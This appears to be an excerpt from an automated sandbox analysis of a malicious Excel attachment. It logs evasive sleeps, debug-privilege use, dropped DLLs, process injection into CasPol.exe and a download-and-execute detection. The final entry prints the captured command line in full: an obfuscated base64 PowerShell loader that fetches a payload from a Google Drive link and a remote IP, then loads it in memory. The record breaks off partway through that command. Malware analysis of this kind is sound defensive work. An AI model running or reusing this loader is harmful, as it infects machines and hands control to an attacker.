Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'MBD014C1E4D/Package' entropy: 7.94807170977 (max. 8.0)
Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'Workbook' entropy: 7.99929899945 (max. 8.0)
Source: 7B130000.0.dr	Stream path 'Workbook' entropy: 7.99922606033 (max. 8.0)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

31_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1996	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5118	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2831	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3784	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 621	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1614	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1707	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1181
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1719
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1612
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9700

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\revod450\revod450.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3740	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 2831 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 3784 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep count: 621 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep count: 1614 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 1707 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 8140 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2432	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408	Thread sleep count: 884 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408	Thread sleep count: 1181 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep count: 1470 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3516	Thread sleep count: 1719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1652	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep count: 697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032	Thread sleep count: 333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 1612 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616	Thread sleep count: 8157 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -4200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep count: 272 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep time: -816000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2960	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep count: 9700 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep time: -29100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1080	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3528	Thread sleep time: -120000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,	31_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	41_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	42_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00418981 memset,GetSystemInfo,

31_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

31_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

31_2_004044A4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0